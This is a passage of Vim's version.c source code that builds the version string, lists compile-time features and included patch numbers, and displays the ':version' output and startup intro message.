* Differences between version 3.0 and 4.x can be found with ":help version4".
* All the remarks about older versions have been removed, they are not very
* interesting.
*/
#include "version.h"
char *Version = VIM_VERSION_SHORT;
static char *mediumVersion = VIM_VERSION_MEDIUM;
#if defined(HAVE_DATE_TIME) || defined(PROTO)
# if (defined(VMS) && defined(VAXC)) || defined(PROTO)
char longVersion[sizeof(VIM_VERSION_LONG_DATE) + sizeof(__DATE__)
+ sizeof(__TIME__) + 3];
void
make_version(void)
{
/*
* Construct the long version string. Necessary because
* VAX C can't catenate strings in the preprocessor.
*/
strcpy(longVersion, VIM_VERSION_LONG_DATE);
strcat(longVersion, __DATE__);
strcat(longVersion, " ");
strcat(longVersion, __TIME__);
strcat(longVersion, ")");
}
# else
char *longVersion = VIM_VERSION_LONG_DATE __DATE__ " " __TIME__ ")";
# endif
#else
char *longVersion = VIM_VERSION_LONG;
#endif
static void list_features(void);
static void version_msg(char *s);
static char *(features[]) =
{
#ifdef HAVE_ACL
"+acl",
#else
"-acl",
#endif
#ifdef AMIGA /* only for Amiga systems */
# ifdef FEAT_ARP
"+ARP",
# else
"-ARP",
# endif
#endif
#ifdef FEAT_ARABIC
"+arabic",
#else
"-arabic",
#endif
#ifdef FEAT_AUTOCMD
"+autocmd",
#else
"-autocmd",
#endif
#ifdef FEAT_BEVAL
"+balloon_eval",
#else
"-balloon_eval",
#endif
#ifdef FEAT_BROWSE
"+browse",
#else
"-browse",
#endif
#ifdef NO_BUILTIN_TCAPS
"-builtin_terms",
#endif
#ifdef SOME_BUILTIN_TCAPS
"+builtin_terms",
#endif
#ifdef ALL_BUILTIN_TCAPS
"++builtin_terms",
#endif
#ifdef FEAT_BYTEOFF
"+byte_offset",
#else
"-byte_offset",
#endif
#ifdef FEAT_JOB_CHANNEL
"+channel",
#else
"-channel",
#endif
#ifdef FEAT_CINDENT
"+cindent",
#else
"-cindent",
#endif
#ifdef FEAT_CLIENTSERVER
"+clientserver",
#else
"-clientserver",
#endif
#ifdef FEAT_CLIPBOARD
"+clipboard",
#else
"-clipboard",
#endif
#ifdef FEAT_CMDL_COMPL
"+cmdline_compl",
#else
"-cmdline_compl",
#endif
#ifdef FEAT_CMDHIST
"+cmdline_hist",
#else
"-cmdline_hist",
#endif
#ifdef FEAT_CMDL_INFO
"+cmdline_info",
#else
"-cmdline_info",
#endif
#ifdef FEAT_COMMENTS
"+comments",
#else
"-comments",
#endif
#ifdef FEAT_CONCEAL
"+conceal",
#else
"-conceal",
#endif
#ifdef FEAT_CRYPT
"+cryptv",
#else
"-cryptv",
#endif
#ifdef FEAT_CSCOPE
"+cscope",
#else
"-cscope",
#endif
#ifdef FEAT_CURSORBIND
"+cursorbind",
#else
"-cursorbind",
#endif
#ifdef CURSOR_SHAPE
"+cursorshape",
#else
"-cursorshape",
#endif
#if defined(FEAT_CON_DIALOG) && defined(FEAT_GUI_DIALOG)
"+dialog_con_gui",
#else
# if defined(FEAT_CON_DIALOG)
"+dialog_con",
# else
# if defined(FEAT_GUI_DIALOG)
"+dialog_gui",
# else
"-dialog",
# endif
# endif
#endif
#ifdef FEAT_DIFF
"+diff",
#else
"-diff",
#endif
#ifdef FEAT_DIGRAPHS
"+digraphs",
#else
"-digraphs",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_DIRECTX
"+directx",
# else
"-directx",
# endif
#endif
#ifdef FEAT_DND
"+dnd",
#else
"-dnd",
#endif
#ifdef EBCDIC
"+ebcdic",
#else
"-ebcdic",
#endif
#ifdef FEAT_EMACS_TAGS
"+emacs_tags",
#else
"-emacs_tags",
#endif
#ifdef FEAT_EVAL
"+eval",
#else
"-eval",
#endif
"+ex_extra",
#ifdef FEAT_SEARCH_EXTRA
"+extra_search",
#else
"-extra_search",
#endif
#ifdef FEAT_FKMAP
"+farsi",
#else
"-farsi",
#endif
#ifdef FEAT_SEARCHPATH
"+file_in_path",
#else
"-file_in_path",
#endif
#ifdef FEAT_FIND_ID
"+find_in_path",
#else
"-find_in_path",
#endif
#ifdef FEAT_FLOAT
"+float",
#else
"-float",
#endif
#ifdef FEAT_FOLDING
"+folding",
#else
"-folding",
#endif
#ifdef FEAT_FOOTER
"+footer",
#else
"-footer",
#endif
/* only interesting on Unix systems */
#if !defined(USE_SYSTEM) && defined(UNIX)
"+fork()",
#endif
#ifdef FEAT_GETTEXT
# ifdef DYNAMIC_GETTEXT
"+gettext/dyn",
# else
"+gettext",
# endif
#else
"-gettext",
#endif
#ifdef FEAT_HANGULIN
"+hangul_input",
#else
"-hangul_input",
#endif
#if (defined(HAVE_ICONV_H) && defined(USE_ICONV)) || defined(DYNAMIC_ICONV)
# ifdef DYNAMIC_ICONV
"+iconv/dyn",
# else
"+iconv",
# endif
#else
"-iconv",
#endif
#ifdef FEAT_INS_EXPAND
"+insert_expand",
#else
"-insert_expand",
#endif
#ifdef FEAT_JOB_CHANNEL
"+job",
#else
"-job",
#endif
#ifdef FEAT_JUMPLIST
"+jumplist",
#else
"-jumplist",
#endif
#ifdef FEAT_KEYMAP
"+keymap",
#else
"-keymap",
#endif
#ifdef FEAT_EVAL
"+lambda",
#else
"-lambda",
#endif
#ifdef FEAT_LANGMAP
"+langmap",
#else
"-langmap",
#endif
#ifdef FEAT_LIBCALL
"+libcall",
#else
"-libcall",
#endif
#ifdef FEAT_LINEBREAK
"+linebreak",
#else
"-linebreak",
#endif
#ifdef FEAT_LISP
"+lispindent",
#else
"-lispindent",
#endif
#ifdef FEAT_LISTCMDS
"+listcmds",
#else
"-listcmds",
#endif
#ifdef FEAT_LOCALMAP
"+localmap",
#else
"-localmap",
#endif
#ifdef FEAT_LUA
# ifdef DYNAMIC_LUA
"+lua/dyn",
# else
"+lua",
# endif
#else
"-lua",
#endif
#ifdef FEAT_MENU
"+menu",
#else
"-menu",
#endif
#ifdef FEAT_SESSION
"+mksession",
#else
"-mksession",
#endif
#ifdef FEAT_MODIFY_FNAME
"+modify_fname",
#else
"-modify_fname",
#endif
#ifdef FEAT_MOUSE
"+mouse",
# ifdef FEAT_MOUSESHAPE
"+mouseshape",
# else
"-mouseshape",
# endif
# else
"-mouse",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_DEC
"+mouse_dec",
# else
"-mouse_dec",
# endif
# ifdef FEAT_MOUSE_GPM
"+mouse_gpm",
# else
"-mouse_gpm",
# endif
# ifdef FEAT_MOUSE_JSB
"+mouse_jsbterm",
# else
"-mouse_jsbterm",
# endif
# ifdef FEAT_MOUSE_NET
"+mouse_netterm",
# else
"-mouse_netterm",
# endif
#endif
#ifdef __QNX__
# ifdef FEAT_MOUSE_PTERM
"+mouse_pterm",
# else
"-mouse_pterm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_SGR
"+mouse_sgr",
# else
"-mouse_sgr",
# endif
# ifdef FEAT_SYSMOUSE
"+mouse_sysmouse",
# else
"-mouse_sysmouse",
# endif
# ifdef FEAT_MOUSE_URXVT
"+mouse_urxvt",
# else
"-mouse_urxvt",
# endif
# ifdef FEAT_MOUSE_XTERM
"+mouse_xterm",
# else
"-mouse_xterm",
# endif
#endif
#ifdef FEAT_MBYTE_IME
# ifdef DYNAMIC_IME
"+multi_byte_ime/dyn",
# else
"+multi_byte_ime",
# endif
#else
# ifdef FEAT_MBYTE
"+multi_byte",
# else
"-multi_byte",
# endif
#endif
#ifdef FEAT_MULTI_LANG
"+multi_lang",
#else
"-multi_lang",
#endif
#ifdef FEAT_MZSCHEME
# ifdef DYNAMIC_MZSCHEME
"+mzscheme/dyn",
# else
"+mzscheme",
# endif
#else
"-mzscheme",
#endif
#ifdef FEAT_NETBEANS_INTG
"+netbeans_intg",
#else
"-netbeans_intg",
#endif
#ifdef FEAT_NUM64
"+num64",
#else
"-num64",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_OLE
"+ole",
# else
"-ole",
# endif
#endif
"+packages",
#ifdef FEAT_PATH_EXTRA
"+path_extra",
#else
"-path_extra",
#endif
#ifdef FEAT_PERL
# ifdef DYNAMIC_PERL
"+perl/dyn",
# else
"+perl",
# endif
#else
"-perl",
#endif
#ifdef FEAT_PERSISTENT_UNDO
"+persistent_undo",
#else
"-persistent_undo",
#endif
#ifdef FEAT_PRINTER
# ifdef FEAT_POSTSCRIPT
"+postscript",
# else
"-postscript",
# endif
"+printer",
#else
"-printer",
#endif
#ifdef FEAT_PROFILE
"+profile",
#else
"-profile",
#endif
#ifdef FEAT_PYTHON
# ifdef DYNAMIC_PYTHON
"+python/dyn",
# else
"+python",
# endif
#else
"-python",
#endif
#ifdef FEAT_PYTHON3
# ifdef DYNAMIC_PYTHON3
"+python3/dyn",
# else
"+python3",
# endif
#else
"-python3",
#endif
#ifdef FEAT_QUICKFIX
"+quickfix",
#else
"-quickfix",
#endif
#ifdef FEAT_RELTIME
"+reltime",
#else
"-reltime",
#endif
#ifdef FEAT_RIGHTLEFT
"+rightleft",
#else
"-rightleft",
#endif
#ifdef FEAT_RUBY
# ifdef DYNAMIC_RUBY
"+ruby/dyn",
# else
"+ruby",
# endif
#else
"-ruby",
#endif
#ifdef FEAT_SCROLLBIND
"+scrollbind",
#else
"-scrollbind",
#endif
#ifdef FEAT_SIGNS
"+signs",
#else
"-signs",
#endif
#ifdef FEAT_SMARTINDENT
"+smartindent",
#else
"-smartindent",
#endif
#ifdef STARTUPTIME
"+startuptime",
#else
"-startuptime",
#endif
#ifdef FEAT_STL_OPT
"+statusline",
#else
"-statusline",
#endif
#ifdef FEAT_SUN_WORKSHOP
"+sun_workshop",
#else
"-sun_workshop",
#endif
#ifdef FEAT_SYN_HL
"+syntax",
#else
"-syntax",
#endif
/* only interesting on Unix systems */
#if defined(USE_SYSTEM) && defined(UNIX)
"+system()",
#endif
#ifdef FEAT_TAG_BINS
"+tag_binary",
#else
"-tag_binary",
#endif
#ifdef FEAT_TAG_OLDSTATIC
"+tag_old_static",
#else
"-tag_old_static",
#endif
#ifdef FEAT_TAG_ANYWHITE
"+tag_any_white",
#else
"-tag_any_white",
#endif
#ifdef FEAT_TCL
# ifdef DYNAMIC_TCL
"+tcl/dyn",
# else
"+tcl",
# endif
#else
"-tcl",
#endif
#ifdef FEAT_TERMGUICOLORS
"+termguicolors",
#else
"-termguicolors",
#endif
#if defined(UNIX)
/* only Unix can have terminfo instead of termcap */
# ifdef TERMINFO
"+terminfo",
# else
"-terminfo",
# endif
#else /* unix always includes termcap support */
# ifdef HAVE_TGETENT
"+tgetent",
# else
"-tgetent",
# endif
#endif
#ifdef FEAT_TERMRESPONSE
"+termresponse",
#else
"-termresponse",
#endif
#ifdef FEAT_TEXTOBJ
"+textobjects",
#else
"-textobjects",
#endif
#ifdef FEAT_TIMERS
"+timers",
#else
"-timers",
#endif
#ifdef FEAT_TITLE
"+title",
#else
"-title",
#endif
#ifdef FEAT_TOOLBAR
"+toolbar",
#else
"-toolbar",
#endif
#ifdef FEAT_USR_CMDS
"+user_commands",
#else
"-user_commands",
#endif
#ifdef FEAT_WINDOWS
"+vertsplit",
#else
"-vertsplit",
#endif
#ifdef FEAT_VIRTUALEDIT
"+virtualedit",
#else
"-virtualedit",
#endif
"+visual",
#ifdef FEAT_VISUALEXTRA
"+visualextra",
#else
"-visualextra",
#endif
#ifdef FEAT_VIMINFO
"+viminfo",
#else
"-viminfo",
#endif
#ifdef FEAT_VREPLACE
"+vreplace",
#else
"-vreplace",
#endif
#ifdef FEAT_WILDIGN
"+wildignore",
#else
"-wildignore",
#endif
#ifdef FEAT_WILDMENU
"+wildmenu",
#else
"-wildmenu",
#endif
#ifdef FEAT_WINDOWS
"+windows",
#else
"-windows",
#endif
#ifdef FEAT_WRITEBACKUP
"+writebackup",
#else
"-writebackup",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_X11
"+X11",
# else
"-X11",
# endif
#endif
#ifdef FEAT_XFONTSET
"+xfontset",
#else
"-xfontset",
#endif
#ifdef FEAT_XIM
"+xim",
#else
"-xim",
#endif
#ifdef WIN3264
# ifdef FEAT_XPM_W32
"+xpm_w32",
# else
"-xpm_w32",
# endif
#else
# ifdef HAVE_XPM
"+xpm",
# else
"-xpm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef USE_XSMP_INTERACT
"+xsmp_interact",
# else
# ifdef USE_XSMP
"+xsmp",
# else
"-xsmp",
# endif
# endif
# ifdef FEAT_XCLIPBOARD
"+xterm_clipboard",
# else
"-xterm_clipboard",
# endif
#endif
#ifdef FEAT_XTERM_SAVE
"+xterm_save",
#else
"-xterm_save",
#endif
NULL
};
static int included_patches[] =
{ /* Add new patch number below this line */
/**/
377,
/**/
376,
/**/
375,
/**/
374,
/**/
373,
/**/
372,
/**/
371,
/**/
370,
/**/
369,
/**/
368,
/**/
367,
/**/
366,
/**/
365,
/**/
364,
/**/
363,
/**/
362,
/**/
361,
/**/
360,
/**/
359,
/**/
358,
/**/
357,
/**/
356,
/**/
355,
/**/
354,
/**/
353,
/**/
352,
/**/
351,
/**/
350,
/**/
349,
/**/
348,
/**/
347,
/**/
346,
/**/
345,
/**/
344,
/**/
343,
/**/
342,
/**/
341,
/**/
340,
/**/
339,
/**/
338,
/**/
337,
/**/
336,
/**/
335,
/**/
334,
/**/
333,
/**/
332,
/**/
331,
/**/
330,
/**/
329,
/**/
328,
/**/
327,
/**/
326,
/**/
325,
/**/
324,
/**/
323,
/**/
322,
/**/
321,
/**/
320,
/**/
319,
/**/
318,
/**/
317,
/**/
316,
/**/
315,
/**/
314,
/**/
313,
/**/
312,
/**/
311,
/**/
310,
/**/
309,
/**/
308,
/**/
307,
/**/
306,
/**/
305,
/**/
304,
/**/
303,
/**/
302,
/**/
301,
/**/
300,
/**/
299,
/**/
298,
/**/
297,
/**/
296,
/**/
295,
/**/
294,
/**/
293,
/**/
292,
/**/
291,
/**/
290,
/**/
289,
/**/
288,
/**/
287,
/**/
286,
/**/
285,
/**/
284,
/**/
283,
/**/
282,
/**/
281,
/**/
280,
/**/
279,
/**/
278,
/**/
277,
/**/
276,
/**/
275,
/**/
274,
/**/
273,
/**/
272,
/**/
271,
/**/
270,
/**/
269,
/**/
268,
/**/
267,
/**/
266,
/**/
265,
/**/
264,
/**/
263,
/**/
262,
/**/
261,
/**/
260,
/**/
259,
/**/
258,
/**/
257,
/**/
256,
/**/
255,
/**/
254,
/**/
253,
/**/
252,
/**/
251,
/**/
250,
/**/
249,
/**/
248,
/**/
247,
/**/
246,
/**/
245,
/**/
244,
/**/
243,
/**/
242,
/**/
241,
/**/
240,
/**/
239,
/**/
238,
/**/
237,
/**/
236,
/**/
235,
/**/
234,
/**/
233,
/**/
232,
/**/
231,
/**/
230,
/**/
229,
/**/
228,
/**/
227,
/**/
226,
/**/
225,
/**/
224,
/**/
223,
/**/
222,
/**/
221,
/**/
220,
/**/
219,
/**/
218,
/**/
217,
/**/
216,
/**/
215,
/**/
214,
/**/
213,
/**/
212,
/**/
211,
/**/
210,
/**/
209,
/**/
208,
/**/
207,
/**/
206,
/**/
205,
/**/
204,
/**/
203,
/**/
202,
/**/
201,
/**/
200,
/**/
199,
/**/
198,
/**/
197,
/**/
196,
/**/
195,
/**/
194,
/**/
193,
/**/
192,
/**/
191,
/**/
190,
/**/
189,
/**/
188,
/**/
187,
/**/
186,
/**/
185,
/**/
184,
/**/
183,
/**/
182,
/**/
181,
/**/
180,
/**/
179,
/**/
178,
/**/
177,
/**/
176,
/**/
175,
/**/
174,
/**/
173,
/**/
172,
/**/
171,
/**/
170,
/**/
169,
/**/
168,
/**/
167,
/**/
166,
/**/
165,
/**/
164,
/**/
163,
/**/
162,
/**/
161,
/**/
160,
/**/
159,
/**/
158,
/**/
157,
/**/
156,
/**/
155,
/**/
154,
/**/
153,
/**/
152,
/**/
151,
/**/
150,
/**/
149,
/**/
148,
/**/
147,
/**/
146,
/**/
145,
/**/
144,
/**/
143,
/**/
142,
/**/
141,
/**/
140,
/**/
139,
/**/
138,
/**/
137,
/**/
136,
/**/
135,
/**/
134,
/**/
133,
/**/
132,
/**/
131,
/**/
130,
/**/
129,
/**/
128,
/**/
127,
/**/
126,
/**/
125,
/**/
124,
/**/
123,
/**/
122,
/**/
121,
/**/
120,
/**/
119,
/**/
118,
/**/
117,
/**/
116,
/**/
115,
/**/
114,
/**/
113,
/**/
112,
/**/
111,
/**/
110,
/**/
109,
/**/
108,
/**/
107,
/**/
106,
/**/
105,
/**/
104,
/**/
103,
/**/
102,
/**/
101,
/**/
100,
/**/
99,
/**/
98,
/**/
97,
/**/
96,
/**/
95,
/**/
94,
/**/
93,
/**/
92,
/**/
91,
/**/
90,
/**/
89,
/**/
88,
/**/
87,
/**/
86,
/**/
85,
/**/
84,
/**/
83,
/**/
82,
/**/
81,
/**/
80,
/**/
79,
/**/
78,
/**/
77,
/**/
76,
/**/
75,
/**/
74,
/**/
73,
/**/
72,
/**/
71,
/**/
70,
/**/
69,
/**/
68,
/**/
67,
/**/
66,
/**/
65,
/**/
64,
/**/
63,
/**/
62,
/**/
61,
/**/
60,
/**/
59,
/**/
58,
/**/
57,
/**/
56,
/**/
55,
/**/
54,
/**/
53,
/**/
52,
/**/
51,
/**/
50,
/**/
49,
/**/
48,
/**/
47,
/**/
46,
/**/
45,
/**/
44,
/**/
43,
/**/
42,
/**/
41,
/**/
40,
/**/
39,
/**/
38,
/**/
37,
/**/
36,
/**/
35,
/**/
34,
/**/
33,
/**/
32,
/**/
31,
/**/
30,
/**/
29,
/**/
28,
/**/
27,
/**/
26,
/**/
25,
/**/
24,
/**/
23,
/**/
22,
/**/
21,
/**/
20,
/**/
19,
/**/
18,
/**/
17,
/**/
16,
/**/
15,
/**/
14,
/**/
13,
/**/
12,
/**/
11,
/**/
10,
/**/
9,
/**/
8,
/**/
7,
/**/
6,
/**/
5,
/**/
4,
/**/
3,
/**/
2,
/**/
1,
/**/
0
};
/*
* Place to put a short description when adding a feature with a patch.
* Keep it short, e.g.,: "relative numbers", "persistent undo".
* Also add a comment marker to separate the lines.
* See the official Vim patches for the diff format: It must use a context of
* one line only. Create it by hand or use "diff -C2" and edit the patch.
*/
static char *(extra_patches[]) =
{ /* Add your patch description below this line */
/**/
NULL
};
int
highest_patch(void)
{
int i;
int h = 0;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] > h)
h = included_patches[i];
return h;
}
#if defined(FEAT_EVAL) || defined(PROTO)
/*
* Return TRUE if patch "n" has been included.
*/
int
has_patch(int n)
{
int i;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] == n)
return TRUE;
return FALSE;
}
#endif
void
ex_version(exarg_T *eap)
{
/*
* Ignore a ":version 9.99" command.
*/
if (*eap->arg == NUL)
{
msg_putchar('\n');
list_version();
}
}
/*
* List all features aligned in columns, dictionary style.
*/
static void
list_features(void)
{
int i;
int ncol;
int nrow;
int nfeat = 0;
int width = 0;
/* Find the length of the longest feature name, use that + 1 as the column
* width */
for (i = 0; features[i] != NULL; ++i)
{
int l = (int)STRLEN(features[i]);
if (l > width)
width = l;
++nfeat;
}
width += 1;
if (Columns < width)
{
/* Not enough screen columns - show one per line */
for (i = 0; features[i] != NULL; ++i)
{
version_msg(features[i]);
if (msg_col > 0)
msg_putchar('\n');
}
return;
}
/* The rightmost column doesn't need a separator.
* Sacrifice it to fit in one more column if possible. */
ncol = (int) (Columns + 1) / width;
nrow = nfeat / ncol + (nfeat % ncol ? 1 : 0);
/* i counts columns then rows. idx counts rows then columns. */
for (i = 0; !got_int && i < nrow * ncol; ++i)
{
int idx = (i / ncol) + (i % ncol) * nrow;
if (idx < nfeat)
{
int last_col = (i + 1) % ncol == 0;
msg_puts((char_u *)features[idx]);
if (last_col)
{
if (msg_col > 0)
msg_putchar('\n');
}
else
{
while (msg_col % width)
msg_putchar(' ');
}
}
else
{
if (msg_col > 0)
msg_putchar('\n');
}
}
}
void
list_version(void)
{
int i;
int first;
char *s = "";
/*
* When adding features here, don't forget to update the list of
* internal variables in eval.c!
*/
MSG(longVersion);
#ifdef WIN3264
# ifdef FEAT_GUI_W32
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit GUI version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit GUI version"));
# endif
# ifdef FEAT_OLE
MSG_PUTS(_(" with OLE support"));
# endif
# else
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit console version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit console version"));
# endif
# endif
#endif
#ifdef MACOS
# ifdef MACOS_X
# ifdef MACOS_X_UNIX
MSG_PUTS(_("\nMacOS X (unix) version"));
# else
MSG_PUTS(_("\nMacOS X version"));
# endif
#else
MSG_PUTS(_("\nMacOS version"));
# endif
#endif
#ifdef VMS
MSG_PUTS(_("\nOpenVMS version"));
# ifdef HAVE_PATHDEF
if (*compiled_arch != NUL)
{
MSG_PUTS(" - ");
MSG_PUTS(compiled_arch);
}
# endif
#endif
/* Print the list of patch numbers if there is at least one. */
/* Print a range when patches are consecutive: "1-10, 12, 15-40, 42-45" */
if (included_patches[0] != 0)
{
MSG_PUTS(_("\nIncluded patches: "));
first = -1;
/* find last one */
for (i = 0; included_patches[i] != 0; ++i)
;
while (--i >= 0)
{
if (first < 0)
first = included_patches[i];
if (i == 0 || included_patches[i - 1] != included_patches[i] + 1)
{
MSG_PUTS(s);
s = ", ";
msg_outnum((long)first);
if (first != included_patches[i])
{
MSG_PUTS("-");
msg_outnum((long)included_patches[i]);
}
first = -1;
}
}
}
/* Print the list of extra patch descriptions if there is at least one. */
if (extra_patches[0] != NULL)
{
MSG_PUTS(_("\nExtra patches: "));
s = "";
for (i = 0; extra_patches[i] != NULL; ++i)
{
MSG_PUTS(s);
s = ", ";
MSG_PUTS(extra_patches[i]);
}
}
#ifdef MODIFIED_BY
MSG_PUTS("\n");
MSG_PUTS(_("Modified by "));
MSG_PUTS(MODIFIED_BY);
#endif
#ifdef HAVE_PATHDEF
if (*compiled_user != NUL || *compiled_sys != NUL)
{
MSG_PUTS(_("\nCompiled "));
if (*compiled_user != NUL)
{
MSG_PUTS(_("by "));
MSG_PUTS(compiled_user);
}
if (*compiled_sys != NUL)
{
MSG_PUTS("@");
MSG_PUTS(compiled_sys);
}
}
#endif
#ifdef FEAT_HUGE
MSG_PUTS(_("\nHuge version "));
#else
# ifdef FEAT_BIG
MSG_PUTS(_("\nBig version "));
# else
# ifdef FEAT_NORMAL
MSG_PUTS(_("\nNormal version "));
# else
# ifdef FEAT_SMALL
MSG_PUTS(_("\nSmall version "));
# else
MSG_PUTS(_("\nTiny version "));
# endif
# endif
# endif
#endif
#ifndef FEAT_GUI
MSG_PUTS(_("without GUI."));
#else
# ifdef FEAT_GUI_GTK
# ifdef USE_GTK3
MSG_PUTS(_("with GTK3 GUI."));
# else
# ifdef FEAT_GUI_GNOME
MSG_PUTS(_("with GTK2-GNOME GUI."));
# else
MSG_PUTS(_("with GTK2 GUI."));
# endif
# endif
# else
# ifdef FEAT_GUI_MOTIF
MSG_PUTS(_("with X11-Motif GUI."));
# else
# ifdef FEAT_GUI_ATHENA
# ifdef FEAT_GUI_NEXTAW
MSG_PUTS(_("with X11-neXtaw GUI."));
# else
MSG_PUTS(_("with X11-Athena GUI."));
# endif
# else
# ifdef FEAT_GUI_PHOTON
MSG_PUTS(_("with Photon GUI."));
# else
# if defined(MSWIN)
MSG_PUTS(_("with GUI."));
# else
# if defined(TARGET_API_MAC_CARBON) && TARGET_API_MAC_CARBON
MSG_PUTS(_("with Carbon GUI."));
# else
# if defined(TARGET_API_MAC_OSX) && TARGET_API_MAC_OSX
MSG_PUTS(_("with Cocoa GUI."));
# else
# if defined(MACOS)
MSG_PUTS(_("with (classic) GUI."));
# endif
# endif
# endif
# endif
# endif
# endif
# endif
# endif
#endif
version_msg(_(" Features included (+) or not (-):\n"));
list_features();
#ifdef SYS_VIMRC_FILE
version_msg(_(" system vimrc file: \""));
version_msg(SYS_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE
version_msg(_(" user vimrc file: \""));
version_msg(USR_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE2
version_msg(_(" 2nd user vimrc file: \""));
version_msg(USR_VIMRC_FILE2);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE3
version_msg(_(" 3rd user vimrc file: \""));
version_msg(USR_VIMRC_FILE3);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE
version_msg(_(" user exrc file: \""));
version_msg(USR_EXRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE2
version_msg(_(" 2nd user exrc file: \""));
version_msg(USR_EXRC_FILE2);
version_msg("\"\n");
#endif
#ifdef FEAT_GUI
# ifdef SYS_GVIMRC_FILE
version_msg(_(" system gvimrc file: \""));
version_msg(SYS_GVIMRC_FILE);
version_msg("\"\n");
# endif
version_msg(_(" user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE);
version_msg("\"\n");
# ifdef USR_GVIMRC_FILE2
version_msg(_("2nd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE2);
version_msg("\"\n");
# endif
# ifdef USR_GVIMRC_FILE3
version_msg(_("3rd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE3);
version_msg("\"\n");
# endif
#endif
version_msg(_(" defaults file: \""));
version_msg(VIM_DEFAULTS_FILE);
version_msg("\"\n");
#ifdef FEAT_GUI
# ifdef SYS_MENU_FILE
version_msg(_(" system menu file: \""));
version_msg(SYS_MENU_FILE);
version_msg("\"\n");
# endif
#endif
#ifdef HAVE_PATHDEF
if (*default_vim_dir != NUL)
{
version_msg(_(" fall-back for $VIM: \""));
version_msg((char *)default_vim_dir);
version_msg("\"\n");
}
if (*default_vimruntime_dir != NUL)
{
version_msg(_(" f-b for $VIMRUNTIME: \""));
version_msg((char *)default_vimruntime_dir);
version_msg("\"\n");
}
version_msg(_("Compilation: "));
version_msg((char *)all_cflags);
version_msg("\n");
#ifdef VMS
if (*compiler_version != NUL)
{
version_msg(_("Compiler: "));
version_msg((char *)compiler_version);
version_msg("\n");
}
#endif
version_msg(_("Linking: "));
version_msg((char *)all_lflags);
#endif
#ifdef DEBUG
version_msg("\n");
version_msg(_(" DEBUG BUILD"));
#endif
}
/*
* Output a string for the version message. If it's going to wrap, output a
* newline, unless the message is too long to fit on the screen anyway.
*/
static void
version_msg(char *s)
{
int len = (int)STRLEN(s);
if (!got_int && len < (int)Columns && msg_col + len >= (int)Columns
&& *s != '\n')
msg_putchar('\n');
if (!got_int)
MSG_PUTS(s);
}
static void do_intro_line(int row, char_u *mesg, int add_version, int attr);
/*
* Show the intro message when not editing a file.
*/
void
maybe_intro_message(void)
{
if (bufempty()
&& curbuf->b_fname == NULL
#ifdef FEAT_WINDOWS
&& firstwin->w_next == NULL
#endif
&& vim_strchr(p_shm, SHM_INTRO) == NULL)
intro_message(FALSE);
}
/*
* Give an introductory message about Vim.
* Only used when starting Vim on an empty file, without a file name.
* Or with the ":intro" command (for Sven :-).
*/
void
intro_message(
int colon) /* TRUE for ":intro" */
{
int i;
int row;
int blanklines;
int sponsor;
char *p;
static char *(lines[]) =
{
N_("VIM - Vi IMproved"),
"",
N_("version "),
N_("by Bram Moolenaar et al."),
#ifdef MODIFIED_BY
" ",
#endif
N_("Vim is open source and freely distributable"),
"",
N_("Help poor children in Uganda!"),
N_("type :help iccf<Enter> for information "),
"",
N_("type :q<Enter> to exit "),
N_("type :help<Enter> or <F1> for on-line help"),
N_("type :help version8<Enter> for version info"),
NULL,
"",
N_("Running in Vi compatible mode"),
N_("type :set nocp<Enter> for Vim defaults"),
N_("type :help cp-default<Enter> for info on this"),
};
#ifdef FEAT_GUI
static char *(gui_lines[]) =
{
NULL,
NULL,
NULL,
NULL,
#ifdef MODIFIED_BY
NULL,
#endif
NULL,
NULL,
NULL,
N_("menu Help->Orphans for information "),
NULL,
N_("Running modeless, typed text is inserted"),
N_("menu Edit->Global Settings->Toggle Insert Mode "),
N_(" for two modes "),
NULL,
NULL,
NULL,
N_("menu Edit->Global Settings->Toggle Vi Compatible"),
N_(" for Vim defaults "),
};
#endif
/* blanklines = screen height - # message lines */
blanklines = (int)Rows - ((sizeof(lines) / sizeof(char *)) - 1);
if (!p_cp)
blanklines += 4; /* add 4 for not showing "Vi compatible" message */
#ifdef FEAT_WINDOWS
/* Don't overwrite a statusline. Depends on 'cmdheight'. */
if (p_ls > 1)
blanklines -= Rows - topframe->fr_height;
#endif
if (blanklines < 0)
blanklines = 0;
/* Show the sponsor and register message one out of four times, the Uganda
* message two out of four times. */
sponsor = (int)time(NULL);
sponsor = ((sponsor & 2) == 0) - ((sponsor & 4) == 0);
/* start displaying the message lines after half of the blank lines */
row = blanklines / 2;
if ((row >= 2 && Columns >= 50) || colon)
{
for (i = 0; i < (int)(sizeof(lines) / sizeof(char *)); ++i)
{
p = lines[i];
#ifdef FEAT_GUI
if (p_im && gui.in_use && gui_lines[i] != NULL)
p = gui_lines[i];
#endif
if (p == NULL)
{
if (!p_cp)
break;
continue;
}
if (sponsor != 0)
{
if (strstr(p, "children") != NULL)
p = sponsor < 0
? N_("Sponsor Vim development!")
: N_("Become a registered Vim user!");
else if (strstr(p, "iccf") != NULL)
p = sponsor < 0
? N_("type :help sponsor<Enter> for information ")
: N_("type :help register<Enter> for information ");
else if (strstr(p, "Orphans") != NULL)
p = N_("menu Help->Sponsor/Register for information ");
}
if (*p != NUL)
do_intro_line(row, (char_u *)_(p), i == 2, 0);
++row;
}
}
/* Make the wait-return message appear just below the text. */
if (colon)
msg_row = row;
}
static void
do_intro_line(
int row,
char_u *mesg,
int add_version,
int attr)
{
char_u vers[20];
int col;
char_u *p;
